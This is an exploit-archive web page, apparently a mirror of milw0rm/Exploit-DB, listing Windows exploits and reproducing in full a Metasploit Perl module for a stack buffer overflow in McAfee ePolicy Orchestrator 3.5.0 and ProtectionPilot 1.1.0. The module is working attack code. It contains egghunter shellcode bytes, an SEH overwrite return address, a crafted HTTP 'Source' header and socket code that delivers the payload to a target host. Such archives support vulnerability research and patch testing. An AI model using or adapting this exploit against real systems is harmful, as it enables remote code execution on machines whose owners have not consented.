Menu

Improved exploit search engine. Try it out

"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)"

Author

muts

Platform

windows

Release date

2006-10-01

Release Date Title Type Platform Author
2019-07-17 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow" remote windows hyp3rlinx
2019-07-17 "Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-17 "WinMPG iPod Convert 3.0 - 'Register' Denial of Service" dos windows stresser
2019-07-16 "Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-16 "DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)" local windows "Xavi Beltran"
2019-07-16 "R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)" local windows blackleitus
2019-07-16 "Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection" dos windows hyp3rlinx
2019-07-15 "Streamripper 2.6 - 'Song Pattern' Buffer Overflow" local windows "Andrey Stoykov"
2019-07-15 "Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)" dos windows "RAMELLA Sebastien"
2019-07-12 "Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation" local windows "Google Security Research"
2019-07-11 "SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow" local windows xerubus
2019-07-12 "Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Multiple Bugs in OpenType Font Handling Related to the _post_ Table" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow Due to Integer Overflow in readTTCDirectory" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readEncoding" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Interpreter Stack Underflow in OpenType Font Handling Due to Missing CHKUFLOW" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack-Based Buffer Overflow in do_set_weight_vector_cube for Large nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth" dos windows "Google Security Research"
Release Date Title Type Platform Author
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2012-08-08 "IBM Proventia Network Mail Security System 2.5 - POST File Read" webapps windows muts
2012-07-24 "Zabbix 2.0.1 - Session Extractor" webapps php muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-23 "Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-22 "ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution" webapps asp muts
2012-07-22 "Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection" webapps php muts
2012-07-21 "SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities" webapps windows muts
2012-07-21 "X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting" webapps php muts
2012-03-23 "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" webapps php muts
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution" remote linux muts
2012-07-21 "AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution" remote linux muts
2012-05-01 "SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection" remote windows muts
2009-09-01 "Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow" remote windows muts
2008-12-10 "Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow" remote windows muts
2008-07-12 "Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)" remote linux muts
2008-04-02 "HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)" remote windows muts
2008-03-26 "Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)" remote windows muts
2008-03-26 "TFTP Server 1.4 - ST Buffer Overflow" remote windows muts
2007-12-12 "HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow" remote windows muts
2007-11-26 "Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal" remote windows muts
2007-10-27 "IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow" remote windows muts
2007-06-03 "IBM Tivoli Provisioning Manager - Remote Overflow (Egghunter)" remote windows muts
2007-03-31 "IBM Lotus Domino Server 6.5 - Remote Overflow" remote windows muts
2007-03-21 "Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)" remote windows muts
2006-10-01 "McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)" remote windows muts
2006-08-26 "Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow" remote windows muts
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/2467/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/2467/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/2467/10595/mcafee-epo-350-protectionpilot-110-source-remote-metasploit/download/", "exploit_id": "2467", "exploit_description": "\"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)\"", "exploit_date": "2006-10-01", "exploit_author": "muts", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::mcafee_epolicy_source;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info =
  {
	'Name'     => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  =>
	  [
		'muts <muts [at] remote-exploit.org>',
		'xbxice[at]yahoo.com',
		'H D Moore <hdm [at] metasploit.com>'
	  ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'win2003' ],
	'Priv'  => 0,

	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 81],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Payload' =>
	  {
		# Space is almost unlimited, but 1024 is fine for now
		'Space'     => 1024,
		'BadChars'  => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0 
	and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1.
	This module is based on the exploit by xbxice and muts.
}),

	'Refs'  =>
	  [
		['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
	  ],

	'DefaultTarget' => 0,
	'Targets' =>
	  [
		['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll
	  ],

	'Keys' => ['epo'],

	'DisclosureDate' => 'Jul 17 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	# Use a egghunter stub to find the payload
	my $eggtag  = Pex::Text::AlphaNumText(4);
	my $egghunt =
	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
	  $eggtag .
	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

	# Create the 64-byte GUID
	my $guid = Pex::Text::AlphaNumText(64);

	# Create the 260 byte Source header
	my $evil = Pex::Text::AlphaNumText(260);

	#
	# A long Source header results in a handful of exceptions.
	# The first exception occurs with a pointer at offset 116.
	# This exception occurs because a function pointer is
	# dereferenced from the overwritten data and then called:
	#  naisp32!naSPIPE_MainWorkFunc+0x3ed:
	#    mov ecx, [eax+0x270] (eax is offset 116)
	#    push ecx
	#    call [eax+0x26c]
	#
	# When this happens, the first SEH in the chain is also
	# overwritten at offset 96, so the exception results
	# in our code being called. If we knew of an address
	# in memory that pointed to our shellcode, we could
	# avoid the SEH completely and use the above call to
	# execute our code. This is actually practical, since
	# we can upload almost arbitrary amounts of data into
	# the heap and then overwrite the function pointer above.
	#
	# This method is left as an excercise to the reader.
	#
	# This module will use the SEH overwrite with a pop/pop/ret or
	# a jmp/call ebx (2000 only) to gain control of execution. This
	# removes the need for a large data upload and should result in
	# reliable execution without the need to brute force.
	#
	# Since the SEH method only leaves ~140 bytes of contiguous
	# shellcode space, we use an egghunter to find the real
	# payload that we stuffed into the heap as POST data.
	#

	# Trigger the exception by passing a bad pointer
	substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."\xff");

	# Return to pop/pop/ret or equivalent
	substr($evil, $target->[1], 4, pack('V', $target->[2]));

	# Jump to the egghunter
	substr($evil, $target->[1] - 4, 2, "\xeb\x1a");

	# Egghunter has 140 bytes of room to work
	substr($evil, $target->[1] + 24, length($egghunt), $egghunt);

	# Create our post data containing the shellcode
	my $data = Pex::Text::AlphaNumText(int(rand(500)+32));

	# Embed the search tag and shellcode
	$data .= ($eggtag x 2) . $shellcode;

	# Add some extra padding
	$data .=  Pex::Text::AlphaNumText(int(rand(500)+32));

	my $req = "GET /spipe/pkg HTTP/1.0\r\n";
	$req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n";
	$req .="Content-Length: ". length($data). "\r\n";
	$req .="AgentGuid=${guid}\r\n";
	$req .="Source=${evil}\r\n";
	$req .= "\r\n";
	$req .= $data;

	$self->PrintLine(sprintf("[*] Trying ".$target->[0]." using 0x%.8x...", $target->[2]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($req);

	$self->PrintLine("[*] Waiting up to two minutes for the egghunter...");
	$s->Recv(-1, 120);
	$self->Handler($s);
	$s->Close;
	return;
}

1;

# milw0rm.com [2006-10-01]